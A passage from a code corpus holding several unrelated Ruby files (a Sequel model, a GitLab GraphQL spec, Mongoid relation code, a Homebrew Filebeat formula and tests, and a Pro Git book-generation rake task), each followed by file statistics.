module Models
DB = Sequel.connect(GrapedMoviez::Configuration.config.db_url)
class Day < Sequel::Model
one_to_many :functions
def validate
super
errors.add(:day, "can't be blank") if day.nil?
end
def self.by_day(day = Date.new)
Day.where(day: day)
end
def self.by_day_range(start_date: Date.new, end_date: Date.new)
day_range = start_date..end_date
Day.where(day: day_range).eager(functions: :reservations)
end
end
end
end
| 22.958333 | 69 | 0.629764 |
1d9c6a9d649ed64191c1ed0e714dff43e8c2eb7f | 2,398 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Updating an escalation policy' do
include GraphqlHelpers
let_it_be(:user) { create(:user) }
let_it_be(:project) { create(:project) }
let_it_be(:escalation_policy) { create(:incident_management_escalation_policy, project: project) }
let_it_be(:schedule) { escalation_policy.rules.first.oncall_schedule }
let(:variables) do
{
id: escalation_policy.to_global_id.to_s,
name: 'Updated Policy Name',
description: 'Updated Description',
rules: [rule_variables]
}
end
let(:rule_variables) do
{
oncallScheduleIid: schedule.iid,
elapsedTimeSeconds: 60,
status: 'ACKNOWLEDGED'
}
end
let(:mutation) do
graphql_mutation(:escalation_policy_update, variables) do
<<~QL
errors
escalationPolicy {
id
name
description
rules {
status
elapsedTimeSeconds
oncallSchedule { iid }
}
}
QL
end
end
let(:mutation_response) { graphql_mutation_response(:escalation_policy_update) }
before do
stub_licensed_features(oncall_schedules: true, escalation_policies: true)
project.add_maintainer(user)
end
it 'updates the escalation policy' do
post_graphql_mutation(mutation, current_user: user)
expect(response).to have_gitlab_http_status(:success)
expect(mutation_response).to eq(
'errors' => [],
'escalationPolicy' => {
'id' => escalation_policy.to_global_id.to_s,
'name' => variables[:name],
'description' => variables[:description],
'rules' => [{
'status' => rule_variables[:status],
'elapsedTimeSeconds' => rule_variables[:elapsedTimeSeconds],
'oncallSchedule' => { 'iid' => schedule.iid.to_s }
}]
}
)
expect(escalation_policy.reload).to have_attributes(
name: variables[:name],
description: variables[:description],
active_rules: [
have_attributes(
oncall_schedule: schedule,
status: rule_variables[:status].downcase,
elapsed_time_seconds: rule_variables[:elapsedTimeSeconds]
)
]
)
end
include_examples 'correctly reorders escalation rule inputs' do
let(:resolve) { post_graphql_mutation(mutation, current_user: user) }
end
end
| 26.351648 | 100 | 0.647206 |
010091381544b61f282a8f4c2f2e11bffb411a77 | 1,281 | =begin
Example:
# fonts
:system.nsfont => NSFont.systemFontOfSize(NSFont.systemFontSize)
:label.nsfont => NSFont.systemFontOfSize(NSFont.labelFontSize)
You can extend the defaults by adding entries:
Symbol.nsfontsize[:big] = 40
:big.nsfont => NSFont
=end
class Symbol
def nsfont(size=nil)
size ||= NSFont.systemFontSize
# system fonts
if Symbol.nsfont.has_key? self
font = SugarCube.look_in(self, Symbol.nsfont)
if size.is_a?(Symbol)
size = size.nsfontsize
end
if font.is_a?(Symbol)
return NSFont.send(font, size)
else
return font.nsfont(size)
end
else
if size.is_a?(Symbol)
size = size.nsfontsize
end
return NSFont.systemFontOfSize(size)
end
end
def nsfontsize
size = SugarCube.look_in(self, Symbol.nsfontsize)
if size.is_a?(Symbol)
return NSFont.send(size)
end
return size.to_f
end
class << self
attr :nsfont
attr :nsfontsize
end
@nsfont = {
system: :"systemFontOfSize:",
bold: :"boldSystemFontOfSize:",
monospace: 'Courier New',
}
@nsfontsize = {
label: :labelFontSize,
button: :buttonFontSize,
small: :smallSystemFontSize,
system: :systemFontSize,
}
end
| 19.119403 | 68 | 0.637783 |
18d22cc7943efa56771fb72ed9b994331b83326d | 22,617 | # encoding: utf-8
module Mongoid
module Relations
module Referenced
# This class defines the behaviour for all relations that are a
# one-to-many between documents in different collections.
class Many < Relations::Many
delegate :count, to: :criteria
delegate :first, :in_memory, :last, :reset, :uniq, to: :target
# Appends a document or array of documents to the relation. Will set
# the parent and update the index in the process.
#
# @example Append a document.
# person.posts << post
#
# @example Push a document.
# person.posts.push(post)
#
# @example Concat with other documents.
# person.posts.concat([ post_one, post_two ])
#
# @param [ Document, Array<Document> ] *args Any number of documents.
#
# @return [ Array<Document> ] The loaded docs.
#
# @since 2.0.0.beta.1
def <<(*args)
docs = args.flatten
return concat(docs) if docs.size > 1
if doc = docs.first
append(doc)
doc.save if persistable? && !_assigning? && !doc.validated?
end
self
end
alias :push :<<
# Appends an array of documents to the relation. Performs a batch
# insert of the documents instead of persisting one at a time.
#
# @example Concat with other documents.
# person.posts.concat([ post_one, post_two ])
#
# @param [ Array<Document> ] documents The docs to add.
#
# @return [ Array<Document> ] The documents.
#
# @since 2.4.0
def concat(documents)
inserts = []
documents.each do |doc|
next unless doc
append(doc)
save_or_delay(doc, inserts) if persistable?
end
persist_delayed(inserts)
self
end
# Build a new document from the attributes and append it to this
# relation without saving.
#
# @example Build a new document on the relation.
# person.posts.build(:title => "A new post")
#
# @overload build(attributes = {}, options = {}, type = nil)
# @param [ Hash ] attributes The attributes of the new document.
# @param [ Hash ] options The scoped assignment options.
# @param [ Class ] type The optional subclass to build.
#
# @overload build(attributes = {}, type = nil)
# @param [ Hash ] attributes The attributes of the new document.
# @param [ Class ] type The optional subclass to build.
#
# @return [ Document ] The new document.
#
# @since 2.0.0.beta.1
def build(attributes = {}, options = {}, type = nil)
if options.is_a? Class
options, type = {}, options
end
doc = Factory.build(type || klass, attributes, options)
append(doc)
doc.apply_post_processed_defaults
yield(doc) if block_given?
doc.run_callbacks(:build) { doc }
doc
end
alias :new :build
# Delete the document from the relation. This will set the foreign key
# on the document to nil. If the dependent options on the relation are
# :delete or :destroy the appropriate removal will occur.
#
# @example Delete the document.
# person.posts.delete(post)
#
# @param [ Document ] document The document to remove.
#
# @return [ Document ] The matching document.
#
# @since 2.1.0
def delete(document)
target.delete(document) do |doc|
if doc
unbind_one(doc)
cascade!(doc)
end
end
end
# Deletes all related documents from the database given the supplied
# conditions.
#
# @example Delete all documents in the relation.
# person.posts.delete_all
#
# @example Conditonally delete all documents in the relation.
# person.posts.delete_all({ :title => "Testing" })
#
# @param [ Hash ] conditions Optional conditions to delete with.
#
# @return [ Integer ] The number of documents deleted.
#
# @since 2.0.0.beta.1
def delete_all(conditions = nil)
remove_all(conditions, :delete_all)
end
# Destroys all related documents from the database given the supplied
# conditions.
#
# @example Destroy all documents in the relation.
# person.posts.destroy_all
#
# @example Conditonally destroy all documents in the relation.
# person.posts.destroy_all({ :title => "Testing" })
#
# @param [ Hash ] conditions Optional conditions to destroy with.
#
# @return [ Integer ] The number of documents destroyd.
#
# @since 2.0.0.beta.1
def destroy_all(conditions = nil)
remove_all(conditions, :destroy_all)
end
# Iterate over each document in the relation and yield to the provided
# block.
#
# @note This will load the entire relation into memory.
#
# @example Iterate over the documents.
# person.posts.each do |post|
# post.save
# end
#
# @return [ Array<Document> ] The loaded docs.
#
# @since 2.1.0
def each
target.each { |doc| yield(doc) if block_given? }
end
# Find the matchind document on the association, either based on id or
# conditions.
#
# @example Find by an id.
# person.posts.find(BSON::ObjectId.new)
#
# @example Find by multiple ids.
# person.posts.find([ BSON::ObjectId.new, BSON::ObjectId.new ])
#
# @param [ BSON::ObjectId, Array<BSON::ObjectId> ] arg The ids.
#
# @return [ Document, Criteria ] The matching document(s).
#
# @since 2.0.0.beta.1
def find(*args)
criteria.find(*args)
end
# Instantiate a new references_many relation. Will set the foreign key
# and the base on the inverse object.
#
# @example Create the new relation.
# Referenced::Many.new(base, target, metadata)
#
# @param [ Document ] base The document this relation hangs off of.
# @param [ Array<Document> ] target The target of the relation.
# @param [ Metadata ] metadata The relation's metadata.
#
# @since 2.0.0.beta.1
def initialize(base, target, metadata)
init(base, Targets::Enumerable.new(target), metadata) do
raise_mixed if klass.embedded?
end
end
# Removes all associations between the base document and the target
# documents by deleting the foreign keys and the references, orphaning
# the target documents in the process.
#
# @example Nullify the relation.
# person.posts.nullify
#
# @since 2.0.0.rc.1
def nullify
criteria.update(foreign_key => nil)
target.clear do |doc|
unbind_one(doc)
end
end
alias :nullify_all :nullify
# Clear the relation. Will delete the documents from the db if they are
# already persisted.
#
# @example Clear the relation.
# person.posts.clear
#
# @return [ Many ] The relation emptied.
#
# @since 2.0.0.beta.1
def purge
unless metadata.destructive?
nullify
else
criteria.delete_all
target.clear do |doc|
unbind_one(doc)
doc.destroyed = true
end
end
end
alias :clear :purge
# Substitutes the supplied target documents for the existing documents
# in the relation. If the new target is nil, perform the necessary
# deletion.
#
# @example Replace the relation.
# person.posts.substitute([ new_post ])
#
# @param [ Array<Document> ] replacement The replacement target.
#
# @return [ Many ] The relation.
#
# @since 2.0.0.rc.1
def substitute(replacement)
if replacement
new_docs, docs = replacement.compact, []
new_ids = new_docs.map { |doc| doc.id }
remove_not_in(new_ids)
new_docs.each do |doc|
docs.push(doc) if doc.send(foreign_key) != base.id
end
concat(docs)
else
purge
end
self
end
# Get a criteria for the documents without the default scoping
# applied.
#
# @example Get the unscoped criteria.
# person.posts.unscoped
#
# @return [ Criteria ] The unscoped criteria.
#
# @since 2.4.0
def unscoped
klass.unscoped.where(
foreign_key => Conversions.flag(base.id, metadata)
)
end
private
# Appends the document to the target array, updating the index on the
# document at the same time.
#
# @example Append the document to the relation.
# relation.append(document)
#
# @param [ Document ] document The document to append to the target.
#
# @since 2.0.0.rc.1
def append(document)
target.push(document)
characterize_one(document)
bind_one(document)
end
# Instantiate the binding associated with this relation.
#
# @example Get the binding.
# relation.binding([ address ])
#
# @param [ Array<Document> ] new_target The new documents to bind with.
#
# @return [ Binding ] The binding.
#
# @since 2.0.0.rc.1
def binding
Bindings::Referenced::Many.new(base, target, metadata)
end
# Get the collection of the relation in question.
#
# @example Get the collection of the relation.
# relation.collection
#
# @return [ Collection ] The collection of the relation.
#
# @since 2.0.2
def collection
klass.collection
end
# Returns the criteria object for the target class with its documents set
# to target.
#
# @example Get a criteria for the relation.
# relation.criteria
#
# @return [ Criteria ] A new criteria.
#
# @since 2.0.0.beta.1
def criteria
Many.criteria(metadata, Conversions.flag(base.id, metadata), base.class)
end
# Perform the necessary cascade operations for documents that just got
# deleted or nullified.
#
# @example Cascade the change.
# relation.cascade!(document)
#
# @param [ Document ] document The document to cascade on.
#
# @return [ true, false ] If the metadata is destructive.
#
# @since 2.1.0
def cascade!(document)
if persistable?
if metadata.destructive?
document.send(metadata.dependent)
else
document.save
end
end
end
# If the target array does not respond to the supplied method then try to
# find a named scope or criteria on the class and send the call there.
#
# If the method exists on the array, use the default proxy behavior.
#
# @param [ Symbol, String ] name The name of the method.
# @param [ Array ] args The method args
# @param [ Proc ] block Optional block to pass.
#
# @return [ Criteria, Object ] A Criteria or return value from the target.
#
# @since 2.0.0.beta.1
def method_missing(name, *args, &block)
if target.respond_to?(name)
target.send(name, *args, &block)
else
klass.send(:with_scope, criteria) do
criteria.send(name, *args, &block)
end
end
end
# Persist all the delayed batch inserts.
#
# @api private
#
# @example Persist the delayed batch inserts.
# relation.persist_delayed([ doc ])
#
# @param [ Array<Document> ] inserts The delayed inserts.
#
# @since 3.0.0
def persist_delayed(inserts)
if inserts.any?
collection.insert(inserts.map(&:as_document))
inserts.each do |doc|
doc.new_record = false
doc.run_after_callbacks(:create, :save)
doc.post_persist
end
end
end
# Are we able to persist this relation?
#
# @example Can we persist the relation?
# relation.persistable?
#
# @return [ true, false ] If the relation is persistable.
#
# @since 2.1.0
def persistable?
!_binding? && (_creating? || base.persisted? && !_building?)
end
# Deletes all related documents from the database given the supplied
# conditions.
#
# @example Delete all documents in the relation.
# person.posts.delete_all
#
# @example Conditonally delete all documents in the relation.
# person.posts.delete_all({ :title => "Testing" })
#
# @param [ Hash ] conditions Optional conditions to delete with.
# @param [ Symbol ] The deletion method to call.
#
# @return [ Integer ] The number of documents deleted.
#
# @since 2.1.0
def remove_all(conditions = nil, method = :delete_all)
selector = conditions || {}
removed = klass.send(method, selector.merge!(criteria.selector))
target.delete_if do |doc|
if doc.matches?(selector)
unbind_one(doc) and true
end
end
removed
end
# Remove all the documents in the proxy that do not have the provided
# ids.
#
# @example Remove all documents without the ids.
# proxy.remove_not_in([ id ])
#
# @param [ Array<Object> ] ids The ids.
#
# @since 2.4.0
def remove_not_in(ids)
removed = criteria.not_in(_id: ids)
if metadata.destructive?
removed.delete_all
else
removed.update(foreign_key => nil)
end
in_memory.each do |doc|
if !ids.include?(doc.id)
unbind_one(doc)
target.delete(doc)
if metadata.destructive?
doc.destroyed = true
end
end
end
end
# Save a persisted document immediately or delay a new document for
# batch insert.
#
# @api private
#
# @example Save or delay the document.
# relation.save_or_delay(doc, [])
#
# @param [ Document ] doc The document.
# @param [ Array<Document> ] inserts The inserts.
#
# @since 3.0.0
def save_or_delay(doc, inserts)
if doc.new_record? && doc.valid?(:create)
inserts.push(doc)
doc.run_before_callbacks(:save, :create)
else
doc.save
end
end
class << self
# Return the builder that is responsible for generating the documents
# that will be used by this relation.
#
# @example Get the builder.
# Referenced::Many.builder(meta, object)
#
# @param [ Document ] base The base document.
# @param [ Metadata ] meta The metadata of the relation.
# @param [ Document, Hash ] object A document or attributes to build
# with.
#
# @return [ Builder ] A new builder object.
#
# @since 2.0.0.rc.1
def builder(base, meta, object)
Builders::Referenced::Many.new(base, meta, object || [])
end
# Get the standard criteria used for querying this relation.
#
# @example Get the criteria.
# Proxy.criteria(meta, id, Model)
#
# @param [ Metadata ] metadata The metadata.
# @param [ Object ] object The value of the foreign key.
# @param [ Class ] type The optional type.
#
# @return [ Criteria ] The criteria.
#
# @since 2.1.0
def criteria(metadata, object, type = nil)
crit = metadata.klass.where(metadata.foreign_key => object)
if metadata.polymorphic?
crit = crit.where(metadata.type => type.name)
end
inverse_metadata = metadata.inverse_metadata(metadata.klass)
if inverse_metadata && inverse_metadata.inverse_of_field
crit = crit.any_in(inverse_metadata.inverse_of_field => [metadata.name, nil])
end
crit
end
# Eager load the relation based on the criteria.
#
# @example Eager load the criteria.
# Proxy.eager_load(metadata, criteria)
#
# @param [ Metadata ] metadata The relation metadata.
# @param [ Array<Object> ] ids The ids of the base docs.
#
# @return [ Criteria ] The criteria to eager load the relation.
#
# @since 2.2.0
def eager_load(metadata, ids)
eager_load_ids(metadata, ids) { |doc, key| IdentityMap.set_many(doc, key) }
end
# Returns true if the relation is an embedded one. In this case
# always false.
#
# @example Is this relation embedded?
# Referenced::Many.embedded?
#
# @return [ false ] Always false.
#
# @since 2.0.0.rc.1
def embedded?
false
end
# Get the foreign key for the provided name.
#
# @example Get the foreign key.
# Referenced::Many.foreign_key(:person)
#
# @param [ Symbol ] name The name.
#
# @return [ String ] The foreign key.
#
# @since 3.0.0
def foreign_key(name)
"#{name}#{foreign_key_suffix}"
end
# Get the default value for the foreign key.
#
# @example Get the default.
# Referenced::Many.foreign_key_default
#
# @return [ nil ] Always nil.
#
# @since 2.0.0.rc.1
def foreign_key_default
nil
end
# Returns the suffix of the foreign key field, either "_id" or "_ids".
#
# @example Get the suffix for the foreign key.
# Referenced::Many.foreign_key_suffix
#
# @return [ String ] "_id"
#
# @since 2.0.0.rc.1
def foreign_key_suffix
"_id"
end
# Returns the macro for this relation. Used mostly as a helper in
# reflection.
#
# @example Get the macro.
# Referenced::Many.macro
#
# @return [ Symbol ] :has_many
def macro
:has_many
end
# Return the nested builder that is responsible for generating the documents
# that will be used by this relation.
#
# @example Get the nested builder.
# Referenced::Many.builder(attributes, options)
#
# @param [ Metadata ] metadata The relation metadata.
# @param [ Hash ] attributes The attributes to build with.
# @param [ Hash ] options The options for the builder.
#
# @option options [ true, false ] :allow_destroy Can documents be
# deleted?
# @option options [ Integer ] :limit Max number of documents to
# create at once.
# @option options [ Proc, Symbol ] :reject_if If documents match this
# option then they are ignored.
# @option options [ true, false ] :update_only Only existing documents
# can be modified.
#
# @return [ NestedBuilder ] A newly instantiated nested builder object.
#
# @since 2.0.0.rc.1
def nested_builder(metadata, attributes, options)
Builders::NestedAttributes::Many.new(metadata, attributes, options)
end
# Get the path calculator for the supplied document.
#
# @example Get the path calculator.
# Proxy.path(document)
#
# @param [ Document ] document The document to calculate on.
#
# @return [ Root ] The root atomic path calculator.
#
# @since 2.1.0
def path(document)
Mongoid::Atomic::Paths::Root.new(document)
end
# Tells the caller if this relation is one that stores the foreign
# key on its own objects.
#
# @example Does this relation store a foreign key?
# Referenced::Many.stores_foreign_key?
#
# @return [ false ] Always false.
#
# @since 2.0.0.rc.1
def stores_foreign_key?
false
end
# Get the valid options allowed with this relation.
#
# @example Get the valid options.
# Relation.valid_options
#
# @return [ Array<Symbol> ] The valid options.
#
# @since 2.1.0
def valid_options
[ :as, :autosave, :dependent, :foreign_key, :order ]
end
# Get the default validation setting for the relation. Determines if
# by default a validates associated will occur.
#
# @example Get the validation default.
# Proxy.validation_default
#
# @return [ true, false ] The validation default.
#
# @since 2.1.9
def validation_default
true
end
end
end
end
end
end
| 32.49569 | 91 | 0.535084 |
919e80f9ab2d5350a256843551f115625428be63 | 932 | module Zoomus
module Actions
module User
def user_list(*args)
options = Utils.extract_options!(args)
Utils.parse_response self.class.post('/user/list', :query => options)
end
def user_create(*args)
options = Utils.extract_options!(args)
Utils.require_params([:type, :email], options)
Utils.parse_response self.class.post('/user/create', :query => options)
end
def user_delete(*args)
options = Utils.extract_options!(args)
Utils.require_params([:id], options)
Utils.parse_response self.class.post('/user/delete', :query => options)
end
def user_custcreate(*args)
options = Utils.extract_options!(args)
Utils.require_params([:type, :email], options)
Utils.parse_response self.class.post('/user/custcreate', :query => options)
end
Utils.define_bang_methods(self)
end
end
end
| 28.242424 | 83 | 0.641631 |
ed78d5a31976fa9be0c32a684cfb6d16db3e66e9 | 461 | # frozen_string_literal: true
Hcaptcha.configure do |config|
# Disable hcaptcha if it is not configured
if Rails.configuration.hcaptcha_site_key.nil? || Rails.configuration.hcaptcha_secret.nil?
config.skip_verify_env << Rails.env.to_s
config.site_key = "FAKE_SITE_KEY"
config.secret_key = "FAKE_SECRET_KEY"
else
config.site_key = Rails.configuration.hcaptcha_site_key
config.secret_key = Rails.configuration.hcaptcha_secret
end
end
| 32.928571 | 91 | 0.778742 |
219b365c449f167fa3b16adb4f2efc6ae1fab4c6 | 4,511 | class Filebeat < Formula
desc "File harvester to ship log files to Elasticsearch or Logstash"
homepage "https://www.elastic.co/products/beats/filebeat"
url "https://github.com/elastic/beats.git",
tag: "v7.9.0",
revision: "b2ee705fc4a59c023136c046803b56bc82a16c8d"
# Outside of the "x-pack" folder, source code in a given file is licensed
# under the Apache License Version 2.0
license "Apache-2.0"
head "https://github.com/elastic/beats.git"
bottle do
cellar :any_skip_relocation
sha256 "cb4df634e349a9514253380f52ce3be98e14d9000347bf866275aaeee40e7457" => :catalina
sha256 "bf8d2976d000f9afda1c7460d65836f6033ba423c7273abba6dcead0d5f4c801" => :mojave
sha256 "0ee274f2bbe43be6476f9458eea0739987f464727790add22f3d253324cf5ee7" => :high_sierra
end
depends_on "go" => :build
depends_on "[email protected]" => :build
uses_from_macos "rsync" => :build
resource "virtualenv" do
url "https://files.pythonhosted.org/packages/b1/72/2d70c5a1de409ceb3a27ff2ec007ecdd5cc52239e7c74990e32af57affe9/virtualenv-15.2.0.tar.gz"
sha256 "1d7e241b431e7afce47e77f8843a276f652699d1fa4f93b9d8ce0076fd7b0b54"
end
# Update MarkupSafe to 1.1.1, remove with next release
# https://github.com/elastic/beats/pull/20105
patch do
url "https://github.com/elastic/beats/commit/5a6ca609259956ff5dd8e4ec80b73e6c96ff54b2.patch?full_index=1"
sha256 "b362f8921611297a0879110efcb88a04cf660d120ad81cd078356d502ba4c2ce"
end
def install
# remove non open source files
rm_rf "x-pack"
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/elastic/beats").install Dir["{*,.git,.gitignore}"]
xy = Language::Python.major_minor_version "python3"
ENV.prepend_create_path "PYTHONPATH", buildpath/"vendor/lib/python#{xy}/site-packages"
resource("virtualenv").stage do
system Formula["[email protected]"].opt_bin/"python3", *Language::Python.setup_install_args(buildpath/"vendor")
end
ENV.prepend_path "PATH", buildpath/"vendor/bin" # for virtualenv
ENV.prepend_path "PATH", buildpath/"bin" # for mage (build tool)
cd "src/github.com/elastic/beats/filebeat" do
# don't build docs because it would fail creating the combined OSS/x-pack
# docs and we aren't installing them anyway
inreplace "magefile.go", "mg.SerialDeps(Fields, Dashboards, Config, includeList, fieldDocs,",
"mg.SerialDeps(Fields, Dashboards, Config, includeList,"
system "make", "mage"
# prevent downloading binary wheels during python setup
system "make", "PIP_INSTALL_PARAMS=--no-binary :all", "python-env"
system "mage", "-v", "build"
system "mage", "-v", "update"
(etc/"filebeat").install Dir["filebeat.*", "fields.yml", "modules.d"]
(etc/"filebeat"/"module").install Dir["build/package/modules/*"]
(libexec/"bin").install "filebeat"
prefix.install "build/kibana"
end
prefix.install_metafiles buildpath/"src/github.com/elastic/beats"
(bin/"filebeat").write <<~EOS
#!/bin/sh
exec #{libexec}/bin/filebeat \
--path.config #{etc}/filebeat \
--path.data #{var}/lib/filebeat \
--path.home #{prefix} \
--path.logs #{var}/log/filebeat \
"$@"
EOS
end
plist_options manual: "filebeat"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_bin}/filebeat</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
log_file = testpath/"test.log"
touch log_file
(testpath/"filebeat.yml").write <<~EOS
filebeat:
inputs:
-
paths:
- #{log_file}
scan_frequency: 0.1s
output:
file:
path: #{testpath}
EOS
(testpath/"log").mkpath
(testpath/"data").mkpath
fork do
exec "#{bin}/filebeat", "-c", "#{testpath}/filebeat.yml",
"-path.config", "#{testpath}/filebeat",
"-path.home=#{testpath}",
"-path.logs", "#{testpath}/log",
"-path.data", testpath
end
sleep 1
log_file.append_lines "foo bar baz"
sleep 5
assert_predicate testpath/"filebeat", :exist?
end
end
| 32.688406 | 141 | 0.651075 |
61ed78b192b91ea0386e99ab67f495218ce1f8f0 | 1,981 | require "testing_env"
require "formula"
require "compat/formula_specialties"
require "formula_installer"
require "keg"
require "testball_bottle"
require "testball"
class InstallBottleTests < Homebrew::TestCase
def temporary_bottle_install(formula)
refute_predicate formula, :installed?
assert_predicate formula, :bottled?
assert_predicate formula, :pour_bottle?
installer = FormulaInstaller.new(formula)
shutup { installer.install }
keg = Keg.new(formula.prefix)
assert_predicate formula, :installed?
begin
yield formula
ensure
keg.unlink
keg.uninstall
formula.clear_cache
Dir["#{HOMEBREW_CACHE}/testball_bottle*"].each { |f| File.delete(f) }
# there will be log files when sandbox is enable.
formula.logs.rmtree if formula.logs.directory?
end
refute_predicate keg, :exist?
refute_predicate formula, :installed?
end
def test_a_basic_bottle_install
MacOS.stubs(:has_apple_developer_tools?).returns(false)
temporary_bottle_install(TestballBottle.new) do |f|
# Copied directly from test_formula_installer.rb as we expect
# the same behavior
# Test that things made it into the Keg
assert_predicate f.bin, :directory?
assert_predicate f.libexec, :directory?
refute_predicate f.prefix+"main.c", :exist?
# Test that things make it into the Cellar
keg = Keg.new f.prefix
keg.link
bin = HOMEBREW_PREFIX+"bin"
assert_predicate bin, :directory?
end
end
def test_build_tools_error
MacOS.stubs(:has_apple_developer_tools?).returns(false)
# Testball doesn't have a bottle block, so use it to test this behavior
formula = Testball.new
refute_predicate formula, :installed?
refute_predicate formula, :bottled?
installer = FormulaInstaller.new(formula)
assert_raises(BuildToolsError) do
installer.install
end
refute_predicate formula, :installed?
end
end
| 25.075949 | 75 | 0.715295 |
7af1272e605392d8539317919a1e2d6037922119 | 14,598 | require 'zip'
require 'nokogiri'
require 'octokit'
require 'pathname'
def expand(content, path, &get_content)
content.gsub(/include::(\S+)\[\]/) do |line|
if File.dirname(path)=="."
new_fname = $1
else
new_fname = (Pathname.new(path).dirname + Pathname.new($1)).cleanpath.to_s
end
new_content = get_content.call(new_fname)
if new_content
expand(new_content.gsub("\xEF\xBB\xBF".force_encoding("UTF-8"), ''), new_fname) {|c| get_content.call (c)}
else
puts "#{new_fname} could not be resolved for expansion"
""
end
end
end
desc "Reset book html to trigger re-build"
task :reset_book2 => :environment do
Book.where(:edition => 2).each do |book|
book.ebook_html = '0000000000000000000000000000000000000000'
book.save
end
end
def genbook (code, &get_content)
template_dir = File.join(Rails.root, 'templates')
nav = '<div id="nav"><a href="[[nav-prev]]">prev</a> | <a href="[[nav-next]]">next</a></div>'
progit = get_content.call("progit.asc")
chapters = {}
appnumber = 0
chnumber = 0
secnumber = 0
ids = {}
# The chapter files are historically located in book/<chapter_name>/1-<chapter_name>.asc
# The new localisation of these files are at the root of the project
chapter_files = /(book\/[01A-C].*\/1-[^\/]*?\.asc|(?:ch[0-9]{2}|[ABC])-[^\/]*?\.asc)/
chaps = progit.scan(chapter_files).flatten
chaps.each_with_index do |filename, index |
# select the chapter files
if filename =~ /(book\/[01].*\/1-[^\/]*\.asc|ch[0-9]{2}-.*\.asc)/
chnumber += 1
chapters ["ch#{secnumber}"] = ['chapter', chnumber, filename]
secnumber += 1
end
# detect the appendices
if filename =~ /(book\/[ABC].*\.asc|[ABC].*\.asc)/
appnumber += 1
chapters ["ch#{secnumber}"] = ['appendix', appnumber, filename]
secnumber += 1
end
end
# we strip the includes that don't match the chapters we want to include
initial_content = progit.gsub(/include::(.*\.asc)\[\]/) do |match|
if $1 =~ chapter_files
match
else
""
end
end
content = expand(initial_content, "progit.asc") { |filename| get_content.call(filename) }
# revert internal links decorations for ebooks
content.gsub!(/<<.*?\#(.*?)>>/, "<<\\1>>")
asciidoc = Asciidoctor::Document.new(content,template_dir: template_dir, attributes: { 'compat-mode' => true})
html = asciidoc.render
alldoc = Nokogiri::HTML(html)
number = 1
book = Book.where(:edition => 2, :code => code).first_or_create
alldoc.xpath("//div[@class='sect1']").each_with_index do |entry, index |
chapter_title = entry.at("h2").content
if !chapters["ch#{index}"]
puts "not including #{chapter_title}\n"
break
end
chapter_type, chapter_number, filename = chapters ["ch#{index}"]
chapter = entry
next if !chapter_title
next if !chapter_number
number = chapter_number
if chapter_type == 'appendix'
number = 100 + chapter_number
end
pretext = entry.search("div[@class=sectionbody]/div/p").to_html
id_xref = chapter.at("h2").attribute('id').to_s
schapter = book.chapters.where(:number => number).first_or_create
schapter.title = chapter_title.to_s
schapter.chapter_type = chapter_type
schapter.chapter_number = chapter_number
schapter.sha = book.ebook_html
schapter.save
# create xref
csection = schapter.sections.where(:number => 1).first_or_create
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
section = 1
chapter.search("div[@class=sect2]").each do |sec|
id_xref = sec.at("h3").attribute('id').to_s
section_title = sec.at("h3").content
html = sec.inner_html.to_s + nav
html.gsub!('<h3', '<h2')
html.gsub!(/\/h3>/, '/h2>')
html.gsub!('<h4', '<h3')
html.gsub!(/\/h4>/, '/h3>')
html.gsub!('<h5', '<h4')
html.gsub!(/\/h5>/, '/h4>')
if xlink = html.scan(/href=\"1-.*?\.html\#(.*?)\"/)
xlink.each do |link|
xref = link.first
html.gsub!(/href=\"1-.*?\.html\##{xref}\"/, "href=\"ch00/#{xref}\"") rescue nil
end
end
if xlink = html.scan(/href=\"\#(.*?)\"/)
xlink.each do |link|
xref = link.first
html.gsub!(/href=\"\##{xref}\"/, "href=\"ch00/#{xref}\"") rescue nil
end
end
if subsec = html.scan(/<img src="(.*?)"/)
subsec.each do |sub|
sub = sub.first
html.gsub!(/<img src="#{sub}"/, "<img src=\"/book/en/v2/#{sub}\"") rescue nil
end
end
puts "\t\t#{chapter_type} #{chapter_number}.#{section} : #{chapter_title} . #{section_title} - #{html.size}"
csection = schapter.sections.where(:number => section).first_or_create
csection.title = section_title.to_s
csection.html = pretext + html
csection.save
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
# record all the xrefs
(sec.search(".//*[@id]")).each do |id|
id_xref = id.attribute('id').to_s
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
end
section += 1
pretext = ""
end
end
book.sections.each do |section|
section.set_slug
section.save
end
end
desc "Generate book html directly from git repo"
task :remote_genbook2 => :environment do
@octokit = Octokit::Client.new(:login => ENV['API_USER'], :password => ENV['API_PASS'])
all_books = {
"be" => "progit/progit2-be",
"cs" => "progit-cs/progit2-cs",
"en" => "progit/progit2",
"es" => "progit/progit2-es",
"fr" => "progit/progit2-fr",
"gr" => "progit2-gr/progit2",
"id" => "progit/progit2-id",
"it" => "progit/progit2-it",
"ja" => "progit/progit2-ja",
"ko" => "progit/progit2-ko",
"nl" => "progit/progit2-nl",
"pl" => "progit2-pl/progit2-pl",
"pt-br" => "progit2-pt-br/progit2",
"ru" => "progit/progit2-ru",
"sl" => "progit/progit2-sl",
"sr" => "progit/progit2-sr",
"tl" => "progit2-tl/progit2",
"tr" => "progit/progit2-tr",
"uk" => "progit/progit2-uk",
"uz" => "progit/progit2-uz",
"zh" => "progit/progit2-zh",
"zh-tw" => "progit/progit2-zh-tw"
}
if ENV['GENLANG']
books = all_books.select { |code, repo| code == ENV['GENLANG']}
else
books = all_books.select do |code, repo|
repo_head = @octokit.ref(repo, "heads/master").object[:sha]
book = Book.where(:edition => 2, :code => code).first_or_create
repo_head != book.ebook_html
end
end
books.each do |code, repo|
begin
blob_content = Hash.new do |blobs, sha|
content = Base64.decode64( @octokit.blob(repo, sha, :encoding => 'base64' ).content )
blobs[sha] = content.force_encoding('UTF-8')
end
repo_tree = @octokit.tree(repo, "HEAD", :recursive => true)
genbook(code) do |filename|
file_handle = repo_tree.tree.detect { |tree| tree[:path] == filename }
if file_handle
blob_content[file_handle[:sha]]
end
end
